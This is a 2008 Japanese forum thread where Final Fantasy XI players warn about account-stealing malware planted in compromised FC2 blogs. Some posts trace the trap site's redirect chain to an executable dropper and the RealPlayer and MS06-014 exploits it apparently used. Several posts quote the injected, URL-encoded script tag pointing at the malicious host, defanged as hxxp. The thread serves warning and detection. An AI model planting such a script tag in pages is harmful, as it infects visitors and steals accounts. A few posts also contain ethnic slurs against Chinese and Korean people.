    ・プレイオンライン各コンテンツ内でのGMコール


いい加減にしろよ■e^^; age

699 :既にその名前は使われています:2008/03/21(金) 20:22:28.60 ID:ltuJAup0
日本国内版GMサポート永久中断に関するお知らせ(3/21)

下記日時におきまして、ゲームマスター(GM)チーム全体会議を行うため、GMサポートを中断いたします。
この時間中は、GMコールをお送りいただきましても、GMがお話を伺うことができませんし、伺いたくもありません。GMによるサポートが必要な場合には、直接スクウェア・エニックスサポートまでお電話下さい。

かたじけのうござる。

             記

日 時:2008年3月21日(金) よりサービス終了まで

対 象:日本国内版で以下のGMサポートをご利用のお客様
    ・プレイオンラインGMコール
    ・プレイオンライン各コンテンツ内でのGMコール

700 :前スレ582:2008/03/21(金) 20:47:28.70 ID:IvuYzG7Q
10日くらいに届くといわれた請求書が来ないので再度サポセンに電話してみた。
すぐに送るはずが、なぜか4月に請求するものたちに誤って入っていたとのこと…
もっと早く催促すればよかった。すぐに月曜に発送しますと言われたけど。
で、1月以降の分もおそらくまた請求かけてくるはずで
じゃあ支払ってインできてもまた同じようにとめられるんだよね?
それって無駄では?こちらがもう支払わないって言ったらどうするの?
という問いに「リスクを負ってインするかどうかはお客様の自由です」だって。
そうだよね。自由だよね。

懲りずに余分にあった別垢で暇つぶししてるけど
被害にあった金曜の夜は、いつもインできるかどうかドキドキしてるわ。
土日サポセン休日で月曜も11時からだから平日仕事の社会人はやきもきするよね。
それを狙ってんのかな。

701 :既にその名前は使われています:2008/03/21(金) 22:10:51.38 ID:pYrp5DdK
保守

702 :既にその名前は使われています:2008/03/21(金) 23:51:13.45 ID:ci/XUxd4
週刊オンラインゲームアップデートレポート
http://www.watch.impress.co.jp/game/docs/20080321/on0321.htm
アカウント盗用を目的とした大規模なニュースが報じられる
被害に遭う前に、セキュリティの見直しを

703 :既にその名前は使われています:2008/03/22(土) 00:14:58.86 ID:RUXIxuA/
age

704 :既にその名前は使われています:2008/03/22(土) 01:27:56.83 ID:8t/nHuh6
注意喚起注意喚起

705 :既にその名前は使われています:2008/03/22(土) 02:20:55.58 ID:MmHd1tKd


706 :既にその名前は使われています:2008/03/22(土) 04:19:24.27 ID:uo3kZ88u
パス抜きのウィルスってルータ経由で感染するのか…。
PC知識限りなく0でエロサイト巡回が趣味で自分のPCを誰にも触らせない弟がいる俺オワタ。


707 :既にその名前は使われています:2008/03/22(土) 06:03:41.92 ID:D48bOfj+
>>706
ルーターがあるなら弟のPCと自分のPCを別セグメントにしてPC間で通信できないよ
うにすればいいんじゃねーの?

708 :既にその名前は使われています:2008/03/22(土) 07:54:23.50 ID:pcABNhlC
また購入者〜スレ落ちたにゃ、もう慣れっこにゃ
春休みパワー凄いなw

709 :既にその名前は使われています:2008/03/22(土) 08:17:31.87 ID:RvtYUyWm
>>707

>>706はセグメント超えとブロードバンドルータ配下にぶら下がる同一セグメント内のHUB経由接続の
区別が分かってないと思うけど。

710 :既にその名前は使われています:2008/03/22(土) 09:21:30.87 ID:s/p1nPgY
ペコろぐに罠が仕込まれていたかも・・・気をつけて!
JSに書かれたURLエンコードされてるアドレスを辿っていくと、
下のアドレスのページを読み込んでいたみたい。
http://www■hellh■net/vip.htm
http://www■hellh■net/dv.htm

今は消されているのかな?
ソースチェッカーオンラインで調べたら、キャッシュを見ているせいか罠っぽいJSも残ってた。
今週末もやばそうだ・・・

711 :既にその名前は使われています:2008/03/22(土) 09:51:03.42 ID:QQIop/6A
>>710
hellhは罠アド。
気をつけて!

712 :既にその名前は使われています:2008/03/22(土) 09:53:41.65 ID:mnXb1A/y
上にもあったけど公式のLSコミュニティが乗っとられたら被害すごそうだね
パス入力したら業者に筒抜けとかなったら頭がおかしくなって死ぬ
あぐる

713 :既にその名前は使われています:2008/03/22(土) 10:34:32.75 ID:5TeUNyVm
>>710
消されていない。
今のhellhはASPで制御を行っている(HTTPヘッダのContentで飛ばす)。
ページ構造は
Default.htm
→head.asp
 →(初回) error.htm
  →dv.htm (スクリプトその1)
  →vip.htm (スクリプトその2)
 →(次回) http://search.fc2.com
スクリプトはvip.exeをダウンロードし実行。
使う脆弱性は以前と変わってなければRealPlayerとMS06-014。

714 :既にその名前は使われています:2008/03/22(土) 10:57:04.98 ID:GEHSzlCf
ぺこログをソースチェッカーオンラインにかけてソース参照して見てるんだが
罠が仕込まれてる箇所が見当たらない。
すまないが自分のところチェックしたいから
もう少し噛み砕いて詳しい場所を教えてもらえないだろうか?

715 :既にその名前は使われています:2008/03/22(土) 11:04:34.06 ID:5TeUNyVm
iframeじゃなくてscript。
URIはエンコしてある。

716 :既にその名前は使われています:2008/03/22(土) 11:05:06.00 ID:s/p1nPgY
>>713
詳しい説明ありがとう

>>714
二つ目の ▲▲ プラグイン カテゴリー1 ▲▲ の下にあったよ

717 :既にその名前は使われています:2008/03/22(土) 11:09:05.70 ID:HbzOlOUL
FC2マジでやばいな
今日はFC2ブログを見に行かないほうがいい

現時点でぺころぐが黒なのは確定?

718 :既にその名前は使われています:2008/03/22(土) 11:11:46.14 ID:GEHSzlCf
>>716
トンクス!
今見てるソースだと以下のようになってるから消えてってことなのかな。
とりあえず自分のトコもみてくるは。
<!--▲▲ プラグイン カテゴリー1 ▲▲-->


<!--▼▼ プラグイン無効時の表示 ▼▼-->
<!--▲▲ プラグイン無効時の表示 ▲▲-->


<!--▼▼ プラグイン カテゴリー2 ▼▼-->

719 :既にその名前は使われています:2008/03/22(土) 11:21:31.11 ID:s/p1nPgY
>>718
自分でペコログを直に見に行った時もそう表示されてた。
だから既に消されてるのかと思ったんだよね
713が見つけた罠は別の部分なのかもしれない。

720 :既にその名前は使われています:2008/03/22(土) 11:22:05.54 ID:u73ogFcu
ウィルス対策ソフトMcAfeeなんだけどPC起動時に自動起動のはずが
エラーで落ちちゃうんだよね。
再起動してもだめだったからもしやとおもいカスペでオンラインスキャン中

残り30%で
見つかったウィルス1、感染したオブジェクト1

ウィルス悪さしてMcAfee起動とめてたのかな・・
とりあえずトライアル版落として駆除してみます



721 :既にその名前は使われています:2008/03/22(土) 11:35:37.70 ID:5TeUNyVm
>>718-719
普通にトップページのソース見てみ。頭のほうに
<script src="hxxp://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
があるでしょ(踏まないようhttpはhxxpにしてある)。

722 :既にその名前は使われています:2008/03/22(土) 11:51:51.97 ID:HbzOlOUL
>721
気になったのでダウンロードツールでindexをファイルとして落としてみた
FC2のアクセス解析のアドレスがwww■hellh■net/w.js になってるんですが・・・

おいおい、やばくね?

723 :既にその名前は使われています:2008/03/22(土) 11:55:22.72 ID:s/p1nPgY
>>721
ありがとーばっちりあったw


724 :既にその名前は使われています:2008/03/22(土) 11:57:08.47 ID:RUXIxuA/
これはネ実全体に注意を促したほうがいいような

725 :既にその名前は使われています:2008/03/22(土) 12:01:20.68 ID:GEHSzlCf
>>721
見落としたのかわからんけど、今みたらしっかりとあった。トンクス。
アクセス解析の直下か・・・

726 :既にその名前は使われています:2008/03/22(土) 12:04:28.37 ID:5TeUNyVm
scriptも使えるってのは >>276 で、
hellhが更新されてるってのは >>626 で書いた(´・ω・`)

727 :既にその名前は使われています:2008/03/22(土) 12:05:14.07 ID:s/p1nPgY
一番読者が多そうなサルスレでは既に話題になってるよ

728 :既にその名前は使われています:2008/03/22(土) 12:08:06.14 ID:RUXIxuA/
立ててみた

FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/

729 :既にその名前は使われています:2008/03/22(土) 12:12:56.10 ID:5TeUNyVm
FC2全体がやられているわけじゃないのに…。
私のブログもFC2。誰も来ないけどね!

730 :既にその名前は使われています:2008/03/22(土) 12:17:43.23 ID:RUXIxuA/
浮上

731 :既にその名前は使われています:2008/03/22(土) 13:06:28.35 ID:1nSfINA3
ペコろぐ見ただけで感染するの?
数時間前に見てもうヴァナにもインしちゃったんだけど・・・

732 :既にその名前は使われています:2008/03/22(土) 13:10:50.27 ID:ePhB4KTm
>>731
windows updateやブラウザなどにもよるが、
その可能性が高いってことだな。
今すぐカスペルスキーオンラインスキャンとか複数の
スキャンサービスでチェックしておけ。

733 :既にその名前は使われています:2008/03/22(土) 13:11:20.75 ID:2EgMgjZt
ネット見ないPCかPS2は持ってないの?

734 :既にその名前は使われています:2008/03/22(土) 13:11:54.42 ID:5TeUNyVm
IE(およびIEコンポーネントブラウザ)で、
以下のいずれかを満たせば感染する可能性がある。
・WindowsUpdateをしていない。
・RealPlayerが入っている。

735 :既にその名前は使われています:2008/03/22(土) 13:14:40.55 ID:vocyVObw
つまりFirefoxかOpera最強って事か

736 :既にその名前は使われています:2008/03/22(土) 13:14:55.35 ID:YN+ttw1L
注意喚起あげ

737 :既にその名前は使われています:2008/03/22(土) 13:18:21.98 ID:wCa2Bfwz
>>731
さようならw

738 :既にその名前は使われています:2008/03/22(土) 13:19:55.51 ID:ndD5A19m
>>731
無茶しやがって・・・

739 :既にその名前は使われています:2008/03/22(土) 13:27:02.59 ID:5TeUNyVm
>>735
今はSafariもあるぜ。
現時点でWindowsでは最も狙われていないブラウザだ(元はMac用だが)。

740 :既にその名前は使われています:2008/03/22(土) 13:35:56.23 ID:vocyVObw
Safariもいいんだけど、重い&仕様の問題で
よく見るサイトでレイアウト崩れるところがあってさw
Firefoxでも同じだけどね。うーむ


741 :既にその名前は使われています:2008/03/22(土) 13:41:08.83 ID:hVrvaUvQ
マイナーで狙われないって条件ならAmaya10.0ってのも

742 :720:2008/03/22(土) 13:41:32.21 ID:u73ogFcu
汗って書き込んでしまったがWinny.exeをマルチウェアとして検知してただけだったw
もうつかってもないし削除しといたわ

マカフィー起動できないのはただの不具合っぽい
問い合わせたら再インストールよろwだった。

このハックまっさかりな時期だからはやとちりしてしまった。

743 :既にその名前は使われています:2008/03/22(土) 13:47:06.09 ID:Sk+5Gwm0
>>742
何事もなかったのは何よりだが、あまりよろしくない原因だな

744 :既にその名前は使われています:2008/03/22(土) 13:49:51.04 ID:5TeUNyVm
>>741
それはマイナー過ぎるw

745 :既にその名前は使われています:2008/03/22(土) 14:04:32.06 ID:ZC/O1gOR
いくらIEでもセキュリティー設定を「高」にしてれば感染しようがないよね?

746 :既にその名前は使われています:2008/03/22(土) 14:04:37.31 ID:hVrvaUvQ
日本語表示が困難つーか無謀なんだけどねAmaya

747 :既にその名前は使われています:2008/03/22(土) 14:31:19.75 ID:Jiv6k8QH
>>745
それですむなら苦労しない

748 :既にその名前は使われています:2008/03/22(土) 14:39:20.62 ID:ZC/O1gOR
>>747
真面目な話、どうやって感染させるの?
JavaもJavascriptもActiveXも無効な状態でどうやってトロイをダウソさせるの?

749 :既にその名前は使われています:2008/03/22(土) 14:41:28.59 ID:Qnt4FZ/o
>>748
そう思うなら、その設定で満足すればいいじゃない。

750 :既にその名前は使われています:2008/03/22(土) 14:42:47.34 ID:ZC/O1gOR
>>749
煽るだけなら無駄なレスをしないでくれ

751 :既にその名前は使われています:2008/03/22(土) 14:49:43.40 ID:D9wiaINR
>>750
知識ないから煽ることしかできないんだろうなw

IEの仕組み的にそれだけしてたら問題ないと思われ。


752 :既にその名前は使われています:2008/03/22(土) 14:51:59.86 ID:Qnt4FZ/o
こんなの煽りでも何でもないだろ・・・・。

753 :既にその名前は使われています:2008/03/22(土) 14:52:40.53 ID:hVrvaUvQ
GDIの脆弱性とかアニメーションカーソルの脆弱性とかもあったから
画像とカーソルもOffに
Ftpとかhttp外のプロトコルを指定してブラウザ以外を起動させたりもあるから
MIME関連の設定も解除

具体的な方法は知らんのぜ

754 :既にその名前は使われています:2008/03/22(土) 14:54:05.39 ID:hVrvaUvQ
あ、FtpはねーなTelnetとか

755 :既にその名前は使われています:2008/03/22(土) 14:55:41.03 ID:Uv6AgB6p
IE高設定したら問題ないとか無いわ

756 :既にその名前は使われています:2008/03/22(土) 15:00:07.08 ID:ZC/O1gOR
>>753-754
なるほどありがとう。
なんか昔生IP抜きとかではやったやり方に似てるね>telnet

757 :既にその名前は使われています:2008/03/22(土) 15:03:47.14 ID:5TeUNyVm
IE7ではgopherもtelnetも廃止された。

758 :既にその名前は使われています:2008/03/22(土) 15:23:12.35 ID:D48bOfj+
IEのセキュリティレベル高にしたらIFRAME無効にしたっけ?
無効にしてないと最近流行りのfc2ブログ関連のは防げないんじゃなかったっけ?

759 :既にその名前は使われています:2008/03/22(土) 15:28:46.97 ID:WkwPB8Le
IFRAME無効にしてても、WindowsUpdateしてなかったらアウトだよ。

760 :既にその名前は使われています:2008/03/22(土) 15:45:50.01 ID:5MOOpotD
http://dl.square-enix.co.jp/fmo/FMONVT.zip

761 :既にその名前は使われています:2008/03/22(土) 15:53:29.89 ID:hVrvaUvQ
>>760これがどうかしたのか?
http://www.playonline.com/fmo/download/tool.html


762 :既にその名前は使われています:2008/03/22(土) 15:55:30.85 ID:s90NMzSV
というかもうPC版はサービス終了するしかないんじゃないのか?

763 :既にその名前は使われています:2008/03/22(土) 16:00:04.14 ID:Jiv6k8QH
セキュリティー設定を高にすれば、危険性は減るが万全じゃない
だからこそセキュリティーソフトなりを使ってより安全性を高めようとしている

この辺がわからずに

「いくらIEでもセキュリティー設定を「高」にしてれば感染しようがないよね?」

と言う問いがされたとすれば、こちらとしては「それですむなら苦労はしない」
としかいいようがない訳で
理解してたらこんな問いもでないと思うが

それでも煽りというのであれば、設定高だけにしておけばよろしいかと

764 :既にその名前は使われています:2008/03/22(土) 16:01:11.16 ID:5MOOpotD
>>761
誤爆wすまそ

765 :既にその名前は使われています:2008/03/22(土) 16:16:29.42 ID:vy+n90eR
>>762
ルータで繋がってたらPS2・箱でもパス抜かれる危険があるんだぞ

766 :既にその名前は使われています:2008/03/22(土) 16:27:55.87 ID:hVrvaUvQ
うちのPCはミラーポートにもつないでるからマジでやばいぜ

767 :既にその名前は使われています:2008/03/22(土) 16:32:06.50 ID:lTsjxnPV
ミラーボールにもつないでいると読んで、うらやましかった

768 :既にその名前は使われています:2008/03/22(土) 16:37:55.57 ID:hVrvaUvQ
PC制御のミラーボールとかどんなんだよwww
つーか自宅にミラーボールとかねーよwwww

769 :既にその名前は使われています:2008/03/22(土) 16:43:25.35 ID:5MOOpotD
USB接続
回転数制御可能
¥3600-

770 :既にその名前は使われています:2008/03/22(土) 16:46:25.89 ID:HfzUpChN
脆弱性ってのは、本来ありえない状況の中に穴が開いてるから脆弱性なわけで・・・
「本来は」Javascript動かしてようが、実行ファイルを勝手に実行されたりせんよ
同じように、セキュリティ設定を最高にしようが、穴が開いてたら勝手に実行される
その穴がどこに開いてるか、というだけの話

771 :既にその名前は使われています:2008/03/22(土) 17:14:17.57 ID:pcABNhlC
うぼぁ、通報しまくれスレまで落ちた。何が起きてるんだ?w

772 :既にその名前は使われています:2008/03/22(土) 17:14:37.16 ID:8t/nHuh6
IEの「インターネットオプション」にある「プライバシー」のつまみはウイルス防御の
安全性ではなくてプライバシーの保護のためのクッキーのブロック設定だと思うよ。
それとはまた別に「セキュリティ」のレベルを設定できる項目があるのかな?

773 :既にその名前は使われています:2008/03/22(土) 17:23:24.13 ID:5MOOpotD
>>771
ハック関連建ちすぎw

774 :既にその名前は使われています:2008/03/22(土) 17:48:53.45 ID:7y+E8mXd
立ちすぎてもいいくらいだろ

775 :既にその名前は使われています:2008/03/22(土) 17:54:41.55 ID:7p3UflXp
業者がfc2ハックに気づく人が少なくなるように、糞スレ乱立させてるんだろう。

776 :既にその名前は使われています:2008/03/22(土) 18:07:57.99 ID:Jiv6k8QH
なんかえらいことになっとるな

777 :既にその名前は使われています:2008/03/22(土) 18:12:08.27 ID:q0RhafP0
ミラーマンがどうした?

778 :既にその名前は使われています:2008/03/22(土) 18:12:34.45 ID:1oBpFBmE
今できるのはセキュリティ導入、アップデータ常に更新、怪しいURLは踏まないくらいかね。あと、ゲーム内業者も通報するといいな。一人一業者通報するだけでちがうぞ

779 :既にその名前は使われています:2008/03/22(土) 18:15:06.17 ID:WppxuQg5
オカ板のスレだけど、1〜11までのテンプレはウィルス対策の参考になるよ

勇気がなくて見れない画像解説スレinオカ板Part115
http://hobby10.2ch.net/test/read.cgi/occult/1204378619/1-11

個人的にはマルウェア駆除の仕方が詳しく載ってる下記のサイトお勧め
■アダルトサイト被害対策の部屋
 http://www.higaitaisaku.com/

780 :731:2008/03/22(土) 18:45:09.71 ID:1nSfINA3
カスペルダウンロードしてスキャンしてみたよ
他のプログラムで使用中のためスキャンできません。というのがいくつか出たけどそれ以外は問題ないみたいだった
FFをログアウトして再チェックした方がいいんだろうか

781 :既にその名前は使われています:2008/03/22(土) 18:47:22.11 ID:8t/nHuh6
>>780
新種の可能性も含めると、どれだけ調べても感染していないって断言するのは難しくなるけど
カスペで平気なら多分大丈夫じゃないかな。
一応PG2入れてみたらどうだろう

782 :既にその名前は使われています:2008/03/22(土) 18:54:36.16 ID:1nSfINA3
ペコログ見てるときもウィルスバスターでチェックしながら見てたんだけど何も検出されなかったんだ
リンク先に飛ばなきゃいいんだろうくらいに考えてたからインしちゃったよorz
PG2とやらも調べてみます。アドバイスありがとう


783 :既にその名前は使われています:2008/03/22(土) 19:06:53.40 ID:5TeUNyVm
バスターw

784 :既にその名前は使われています:2008/03/22(土) 19:08:58.27 ID:3QmEvd6Q
このやばいブログって
そのブログ書いてる人が仕込んでるの?

785 :既にその名前は使われています:2008/03/22(土) 19:14:09.83 ID:Yp9qNcd0
>>784
んなわけないが
どういう経路で改竄されたのかは不明だな。

ペコろぐのIDとパスを業者が入手して、ログイン→テンプレ改竄したのか
FC2自体に問題があって、どのブログでも改竄できる可能性があるのか。

786 :既にその名前は使われています:2008/03/22(土) 19:24:26.75 ID:ku5aN7/A
FC2のIDpass抜かれたにしても、
FC2の脆弱さをついたにしても、
どちらにせよどのブログでも改竄される可能性は有るとみるべきだろうね

IDpass抜かれての→改竄じゃ、FC2だけでなくそれこそどのブログも危ない。
この場合はテンプレに仕組めなくとも記事にリンク貼り付ける事だって出来るのだから
JVスクリプトやインラインフレームが使えないブログだろうが危険って事になる。

787 :既にその名前は使われています:2008/03/22(土) 19:47:25.31 ID:PyYqXxGd
糞業者死ねage

788 :既にその名前は使われています:2008/03/22(土) 19:51:59.32 ID:MmHd1tKd
>>782
蛇足だけどPG2の正式名称はPeerGuardian 2 な
検索でもでてくるけど

789 :既にその名前は使われています:2008/03/22(土) 21:44:40.55 ID:uQjThc3f
注意喚起age

790 :既にその名前は使われています:2008/03/22(土) 22:41:17.81 ID:c1EjNdx9
fc2は昔からこの手の対策がヌルい印象がある。
Googleブログ検索の最新検索結果にしつこく残るのがfc2のスパムブログだった。

791 :既にその名前は使われています:2008/03/22(土) 23:24:08.56 ID:8Qq7p8wI
PG2の設定でリネ資料室を参考にする場合は、PG2のリスト管理の画面で表示されるファイルは
「中国・韓国・台湾」と「Lineageトロイ」の2つであってますか?


792 :既にその名前は使われています:2008/03/22(土) 23:44:31.66 ID:ePhB4KTm
ヴァナモンblogハクられてるしwwwww
テラヤバスwwwwwwwww

793 :既にその名前は使われています:2008/03/22(土) 23:56:00.48 ID:IXSPhTOx
何か悲しいよなぁ、ヴァナの中にはここ見てないやつで
ブログ巡回してる人なんて多数いるだろうに・・・
自己責任とはいえ、ここに張られてるURLに飛ぶのとは訳が違うからなぁ
次の■e発売のネットゲーのためにもとっとと対応してもらいたいもんだ

794 :既にその名前は使われています:2008/03/22(土) 23:59:39.73 ID:UQcw9Ojd
ヴァナモンの詳細kwsk

795 :既にその名前は使われています:2008/03/23(日) 00:01:34.90 ID:jZEtFSnG
>>791
登録の仕方があってるならあってる

796 :既にその名前は使われています:2008/03/23(日) 00:01:43.36 ID:ufQYSroS
>>791
あってるよ

797 :既にその名前は使われています:2008/03/23(日) 00:16:01.99 ID:5xv78arS
>>794
ヴァナモンブログのURLをgoogle検索すると
「有害なスクリプトが含まれています。」
ページのソースみると
<script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
ってのがある。(実際にはhttpだが改変。)

798 :791:2008/03/23(日) 00:16:07.31 ID:ZKgLDHHD
ありがとうございます。
PG2をインストールした時はリネ資料室の設定手順を見てなかったので、
PG2側で用意してくれてたリストも出してたのですが、リネ資料室の手順では
PG2側で用意してくれてるリストは全てチェック入れなくていいと書いてあったので
後から消したのですけど本当に消してよかったのか気になってました。

799 :既にその名前は使われています:2008/03/23(日) 01:14:08.93 ID:C025yDr/
ほしゅる

800 :既にその名前は使われています:2008/03/23(日) 01:39:30.88 ID:m4+CSXBl
垢ハック業者がODN使ってたらしくODN全ユーザーが今まで規制されてたよ
今は一部ホスト規制になったけどまたいつ規制されるかわからなくて俺涙目


801 :既にその名前は使われています:2008/03/23(日) 01:43:53.45 ID:BF1y+lk+
OFSfb-(ODNドメインの一部)は罠サイト貼りまくりで2ch以外のFF関連サイト
では軒並み規制されてる。いろいろ面倒だけど、業者を撃退するにはやむを得ないと
あきらめてる。

802 :既にその名前は使われています:2008/03/23(日) 01:56:52.64 ID:oaVT+1dp
>>800
最近業者の宣伝に使われる事多いよな…
俺は別プロバイダ(eoだよこんちくしょー)だが、気持ち解るぜ…
今夜は飲み明かそうぜ…

803 :既にその名前は使われています:2008/03/23(日) 01:59:11.23 ID:m0/ANJjp
>>797
ヴァナモンの方は大丈夫?
ブログのみ?

804 :既にその名前は使われています:2008/03/23(日) 02:00:58.11 ID:7Pxz+tiR
スクエニは認証方法を変える対策しないと駄目だろ
FF11でグダグダだったら以降のネトゲも評価するきにならん


805 :既にその名前は使われています:2008/03/23(日) 02:10:04.85 ID:jGdH/gj4
さっきまで規制されてたODNだけど
速攻カウンターで削除依頼だしまくって締め出すしかいい対策が思いうかばねぇ
まだ規制されてる人も居るんですなおに喜べない。

協力してくれる人が居れば嬉しい。
削除依頼のしかたは知らない。

806 :既にその名前は使われています:2008/03/23(日) 02:12:33.60 ID:alV122Bi
速攻で削除依頼しまくるしかない!
お前ら協力してくれ!
でも俺は依頼の仕方知らない。


どんだけーwwwwwwwwwwww

807 :既にその名前は使われています:2008/03/23(日) 02:17:58.56 ID:jGdH/gj4
サーセンwwwwwwwwwwwwwwwwwwwwwwww

こんなことくだらないことが書き込めるなんてうれしいっビクビクッ

808 :既にその名前は使われています:2008/03/23(日) 02:45:06.39 ID:BF1y+lk+
罠サイトコピペを見つけたらBoo2008で撃退できないか試してください。
Boo2008というのは公開プロクシを焼く(規制する)2chの仕組みで、誰でも利用できます。
↓ここにある「Boo2008 RED」に罠カキコのURLなどを指定して実行すると、書き込んだホストを
調査してそれが公開プロクシあるいは逆引き名前解決ができないホストであれば、書き込みを
規制できます。
http://boo.2ch.net/
ODNのOFSfb-、TEPte-が規制されている今、罠カキコの多くがBoo2008で焼けるホストから
ポストされています。実行結果に「Wow! tasty good!」と表示されれば「焼けた」しるしです。

Jane Style/Nida/Viewを使っているなら、こちらにある「Boo2008 REDスクリプト」を使うと
簡単にBooできます。
ttp://www.geocities.jp/nanasi_san_exe/
ちなみに、このサイトはJane Viewのヘルプを作っているかたのサイトです。

809 :既にその名前は使われています:2008/03/23(日) 02:50:16.29 ID:Y0PuukFM
公式もついに来たね

810 :既にその名前は使われています:2008/03/23(日) 02:52:47.87 ID:7Pxz+tiR
>>809



811 :既にその名前は使われています:2008/03/23(日) 03:00:09.44 ID:SdrCzK3B
ネカフェとかでやってるやつもそんなにいないと思うし、
家のIPからだけしか繋げられないとかできないもんなの?■e

812 :既にその名前は使われています:2008/03/23(日) 03:21:20.56 ID:1NIP/0wq
垢ハックのせいで以前のようにweb巡りしながら気楽に遊べなくなっちまったな
立派な営業妨害だと思うが大元がシナである限りどうしようもないという

いまや気楽に遊べるのは、何も知らないだけの奴か
FFを遊んでいるハードとweb端末を完全に隔離している奴だけという

813 :既にその名前は使われています:2008/03/23(日) 03:25:44.91 ID:dp5+7hHR
カスペルスキーでしか検出できない?

814 :既にその名前は使われています:2008/03/23(日) 03:27:18.41 ID:YRC99ICz
>>809
公式になにもきてないわけだが?


815 :既にその名前は使われています:2008/03/23(日) 04:05:18.72 ID:1XW8eX52
LSメンが2週連続でハックされた
今度は鯖移動のおまけつきで
ウイルスが消えてない状態でパスをかえてまたインしてしまったのか連絡がつかないので
詳細はわからない
かなり異例だと思うし、されるほうにも問題があると思うが一度ハックされても事後処理は隅まで行おう

816 :既にその名前は使われています:2008/03/23(日) 04:05:40.62 ID:fIC9E8u/
このスレは常時ageでお願いします

817 :既にその名前は使われています:2008/03/23(日) 04:12:08.56 ID:EoJTviQ/
>>811
地方に出張したリーマンプレイヤーとかよくネカフェとかでやってるぞ、まぁ大抵そこでパスぬかれるぽいけど…

818 :既にその名前は使われています:2008/03/23(日) 04:12:08.22 ID:+ili/ZnK
リンクシェルコミュニティに障害のこと?まさかこれ業者なのか?

819 :既にその名前は使われています:2008/03/23(日) 04:35:21.82 ID:1ZZqShk7
バスターってダメなのか?w

820 :既にその名前は使われています:2008/03/23(日) 04:40:02.00 ID:xXOcBYrs
俺バスター使ってるけど駄目って程でもないよ
もちろんバスターだけにセキュリティを任せるわけじゃなく
ここでも紹介されてるソフトいれたりIEの設定を変えたり
怖いからPCではインターネットするのを止めた

821 :既にその名前は使われています:2008/03/23(日) 04:43:54.72 ID:k6O3D8qp
別スレ見て来ました
現在IE+つぼでFc2やら2chを見ていて、自分自身Fc2ブログを書いてるのですが今回の対策としては

オペラを入れて、これからはオペラでネットを閲覧するようにすれば多少は防衛になるのでしょうか?
後、fc2に罠が仕掛けられていた場合怖いので、チェックする方法を教えてほしいのですが・・・

822 :既にその名前は使われています:2008/03/23(日) 04:45:29.75 ID:yTE0O1n2
>>821
カスペルスキーオンラインスキャン
ttp://www.kaspersky.co.jp/virusscanner

823 :既にその名前は使われています:2008/03/23(日) 04:46:03.79 ID:wMXhzoTf
>820
>怖いからPCではインターネットするのを止めた
結局ダメじゃね?w

824 :既にその名前は使われています:2008/03/23(日) 04:48:23.92 ID:xXOcBYrs
まじクソ業者しねばいいのに
もう業者じゃなくてただの犯罪者だよなぁっさっさとしねや

825 :既にその名前は使われています:2008/03/23(日) 04:51:19.78 ID:qYTIKKd0
>>822
>>821は自分のブログのテンプレに罠が仕掛けられて無いか確かめる手段を探してるんじゃないか?

826 :既にその名前は使われています:2008/03/23(日) 04:57:12.16 ID:yTE0O1n2
ソースみて
<script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
なのがあると駄目みたい?

カスペのスキャン終わらねw

827 :既にその名前は使われています:2008/03/23(日) 05:09:28.94 ID:Sa/L7U8w
>>826
あからさまに中華サイトだね。
中国とか取り締まりも適当そうだし、
日本相手の悪事なら愛国無罪ってことで容認してそう。

828 :既にその名前は使われています:2008/03/23(日) 05:18:34.48 ID:g7ReYxt9
ウィルスバスターとかに「個人情報の保護」ってのがあって
外に出したくない情報をブロックできるらしいんだが、POLパスとかコレに登録しても無駄?

829 :既にその名前は使われています:2008/03/23(日) 05:20:59.47 ID:yTE0O1n2
>>828
無駄とのこと。
どっかにのってたが忘れた

上の方にも少しあるな

830 :既にその名前は使われています:2008/03/23(日) 06:49:14.22 ID:0L5LrBc7
Xbox360はいいよぉ
好きな音楽聴きながらFFできるし
ビシージ中にフリーズだけは勘弁だが

831 :既にその名前は使われています:2008/03/23(日) 07:27:13.68 ID:gqfp4hIG
朝から糞スレ乱立してるねぇ…すぐに落ちそうなので支援あげ。

832 :既にその名前は使われています:2008/03/23(日) 07:32:37.55 ID:IvMv0FMy
カスペルスキャン&POLパス変更age。

833 :既にその名前は使われています:2008/03/23(日) 07:39:29.81 ID:67blZkYV
>>830
PS2も360も安全じゃない。

834 :既にその名前は使われています:2008/03/23(日) 08:44:25.36 ID:qNA8h4QZ
PGいれたらバンバン中華、韓国、台湾のIPがブロックされている履歴がでるんだが
これはかなりまずいんだろうか

835 :既にその名前は使われています:2008/03/23(日) 08:54:27.69 ID:KS/szTZf
業者じゃなかろうがあんなキチガイ民族のIPなんぞ蹴っちまえ

836 :既にその名前は使われています:2008/03/23(日) 09:22:43.05 ID:5xv78arS
>>834
MSやWikipediaなんかは台湾や韓国に鯖置いてる。
なのでブロックした内容が全て危険とは限らない。
もちろん安全とも限らないがな。

837 :既にその名前は使われています:2008/03/23(日) 09:22:56.19 ID:MFlpIDYY
カスペのオンラインスキャンがそろそろ終わりそうage

838 :既にその名前は使われています:2008/03/23(日) 09:29:52.73 ID:IIluebVc
PG入れたんだが、ちょこちょこ履歴が更新されてて
IP見ただけじゃどこに送信してるのかわからんから怖いなww
PCの知識無いと全然ダメだな(´Д⊂

839 :既にその名前は使われています:2008/03/23(日) 10:22:16.00 ID:ZQJPSeZu
>>833
PS2やダメ箱でIntelなWinAPIが叩けるわけもなく。
もし、それぞれで動作したというウィルスなりワームがあったというなら
ソースよろ

840 :既にその名前は使われています:2008/03/23(日) 10:26:19.69 ID:5xv78arS
>>839
このスレの上の方にルーター共有がまずいとある。
パソコンが箱○を周辺機器として認識してしまうからね。

841 :既にその名前は使われています:2008/03/23(日) 10:32:05.97 ID:gPE92pFK
>>840
箱がSMB喋って、PCが勝手に箱のフォルダ覗いてパス抜くってことか?
ありえねー

842 :既にその名前は使われています:2008/03/23(日) 10:40:29.37 ID:5xv78arS
>>841
俺に突っ込まれても、俺は詳しくないのでコピペで。
----------------
730 名前: 既にその名前は使われています 投稿日: 2008/03/06(木) 21:21:21.02 ID:ztEZEpQX
PS2やXBOX360だからと言って安心できないようだ。

Spyware.AcePasswdSnif は、ローカルエリアネットワークを介したユーザーパスワードを監視し
キャプチャする、スパイウェアプログラムです。
http://www.symantec.com/ja/jp/business/security_response/writeup.jsp?docid=2008-030312-0133-99

